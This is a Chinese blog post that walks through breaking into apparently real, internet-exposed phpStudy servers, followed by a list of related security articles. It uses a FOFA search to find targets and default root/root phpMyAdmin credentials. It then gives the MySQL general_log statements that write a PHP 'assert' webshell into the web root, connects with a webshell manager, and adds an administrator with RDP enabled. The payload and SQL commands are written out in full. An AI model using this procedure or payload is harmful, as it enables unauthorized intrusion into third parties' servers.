弱口令登录phpmyadmin拿到webshell开启3389登录远程桌面(实战)

最新推荐文章于 2024-09-23 22:26:57 发布
最新推荐文章于 2024-09-23 22:26:57 发布
阅读量2.5k 收藏 6
点赞数 2
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45945976/article/details/109241871
版权

前期准备
首先信息收集一波确认目标,:fofa: body=“phpstudy探针” && title=“phpStudy 探针 2014”
在这里插入图片描述
找几个心仪的目标下手,打开的页面是这样的
在这里插入图片描述

正文
记住这个绝对路径,后面用得上,然后页面拉到最后,使用弱口令对MySQL数据库连接进行检测。一般phpstudy默认配置的mysql账号密码为root/root,直接使用这个去尝试登录
在这里插入图片描述
但是这种命中率五五开吧,这个不行,就换一个吧,毕竟这个测试,开头还是需要弱口令进去,或者自己也可以跑字典做其他的尝试,显示这样“连接到MySql数据库正常”就是可以的。
访问:http://xxx.xxx.xxx.229:88/phpmyadmin
弱口令:root root 登录
在这里插入图片描述
通过SQL指令来操作
show variables like ‘general_log’; – 查看日志是否开启
set global general_log=on; – 开启日志功能
show variables like ‘general_log_file’; – 看看日志文件保存位置
set global general_log_file=‘tmp/general.lg’; – 设置日志文件保存位置
show variables like ‘log_output’; – 看看日志输出类型 table或file
set global log_output=‘table’; – 设置输出类型为 table
set global log_output=‘file’; – 设置输出类型为file

1.查看日志是否开启:show variables like ‘general_log’; – 查看日志是否开启
在这里插入图片描述
2.开启日志:set global general_log=on;
在这里插入图片描述
3.查看日志文件保存位置show variables like ‘general_log_file’;
在这里插入图片描述
4.修改日志保存路径文件,注意要准确到文件名:set global general_log_file=’ D:/WWW/aaa.php’; //根据实际情况来定
在这里插入图片描述
5. 更简单一点的方法,在变量处,找到general_log、general_log_file,然后general_log改成ON、general_log_file改为网站根目录下的文件名:. 在这里插入图片描述
6.然后通过日志来写入一句话:
SELECT’<?phpassert($_POST["cmd"]);?>’;
在这里插入图片描述
7.菜刀连接一句话:
在这里插入图片描述
8.连接成功:
在这里插入图片描述
9.虚拟终端查看权限:whoami

在这里插入图片描述
10.添加管理员用户并开启3389,直接进远程桌面:
在这里插入图片描述

内蒙古打野
关注
专栏目录
ATT&CK实战系列——红队实战(—)
lza20001103的博客
07-17 1396
ATT&CK实战系列——红队实战(—)
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
phpmyadmin弱口令批量利用3传(ok)
06-29
phpmyadmin弱口令批量利用3传(ok) 批量执行,仅供网络测试
45.网络安全渗透测试—[穷举篇8]—[phpMyAdmin登录弱口令穷举]
qwsn
01-12 4213
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、phpMyAdmin登录弱口令 1、两个工具: 2、示例:
从网页访问你的windows桌面
最新发布
qq_47719799的博客
09-23 1173
使用Guacamle搭建Web远程桌面的流程, 任意浏览器即可访问Windows远程桌面
PHPMyAdmin弱口令猜解【Python脚本】
12-07 2258
PHPMyAdmin弱口令猜解 测试截图:  代码片段 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_list=['root','','admin','123456','password'] def phpMyAdm...
phpmyadmin弱口令检测工具
01-19
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8131
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQLPHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
DNS域名解析协议与弱口令登录
山兔的博客
11-04 533
网络知识对于我们作为即将成为网络安全工程师的整体准备情况起着重要作用。如果应用了足够的网络知识,则Active Directory,Kerberos身份验证,服务器消息块,超文本传输协议,安全外壳等功能都可以分解为(几乎)最简单的形式。无论多么广泛,我们都将只探索整个网络主题的一部分,特别是HTTP,VHosts和DNS,以此为目标。在网络之旅开始时,我们可能会发现自己在非常一般的宏观级别上了解主机和服务器之间的连接。数据包只是从我们的一端传输到服务器,然后返回响应,对吧?
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1552
phpmyadmin弱口令至getshell 漏洞复现
mariadb弱口令登录
山兔的博客
11-02 425
学习如何浏览数据库非常重要,因为大多数关键数据(包括用户名和密码)都存储在其中,这些数据可能用于获得对目标系统的最高特权访问权限。在之前的文章中,我们已经谈到了数据库的主题。但是,在这篇文章中,我们将学习如何浏览它们。Web服务器和其他服务使用MySQL,MariaDB或其他技术等数据库的原因是为了将累积的数据存储在易于访问且组织良好的地方。该数据可以代表用户名,密码,帖子,消息,用户加入的确切日期以及其他信息 - 具体取决于网站的目的。每个数据库都包含表,而表又包含行和列。
Azkaban WebServer弱口令登录
Kevin's Blog
05-11 1159
文章目录一、介绍二、漏洞原因三、检测方法四、防御方法 (全世界威胁站点服务使用数量统计:) 一、介绍   开源、运行Hadoop作业的批量工作流作业调度程序(组织调度复杂的执行计划调度系统),使用Job配置文件建立文件之间的依赖关系,并提供一个易于使用的web用户界面维护跟踪工作流。 二、漏洞原因   Azkaban web服务器用户配置文件中管理员用户密码使用弱密码。 (常见的管理员用户和密码) root root admin admin azkaban azkaban …… 三、检测方法 》》进入a
记一次phpMyAdmin弱口令爆破事件应急响应
Boom!脑洞大爆炸的博客
06-27 1120
记一次phpMyAdmin弱口令爆破事件应急响应
远程桌面弱口令攻击:网络安全的顽疾与挑战
laobaisoft的博客
08-11 1004
2.1 近年来的典型弱口令攻击事件剖析 列举一些近年来发生的远程桌面弱口令攻击事件,如2016年Dyn DNS的DDoS攻击事件,以及2019年Mirai僵尸网络的攻击事件,并剖析攻击的原因和影响。结语: 远程桌面弱口令攻击是网络安全中的一个严峻问题,但通过加强安全意识、采取适当的防范措施,我们能够降低遭受攻击的风险,确保远程桌面的安全性。1.1 什么是远程桌面弱口令攻击 远程桌面弱口令攻击是指黑客利用弱密码或默认密码的漏洞,通过尝试常见的密码组合或使用自动化工具来猜测密码,进而获取远程桌面访问权限。
Windows系统口令扫描之——使用Tscrack扫描3389口令
lucia的博客
03-05 1396
3389终端攻击主要通过3389破解登录器(Tscrack)实现。Tscrack是微软远程终端服务(3389)的测试产品,有人将其做了一些修改,可以用来破解3389口令,其核心原理就是利用字典配合远程终端登陆器尝试登陆,一旦登录成功,则可认为破解成功。 01Tscrack安装 Tscrack初次运行需要进行安装,直接运行tscrack.exe程序即可。如果不能正常运行,则需要运行“tscrack -U”命令卸载tscrack中的组件后再运行tscrack.exe。运行成功后会提示安装组件、解压缩组件、注册组
解决phpMyAdmin登录提示'必须启用Cookies'的问题
"在使用phpMyAdmin时遇到'必须启用Cookies才能登录'的问题,通常与配置文件设置有关。解决方法包括确保config.sample.inc.php被正确地重命名为config.inc.php,并且在该文件中设置$cfg['blowfish_secret']为'cookie'...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值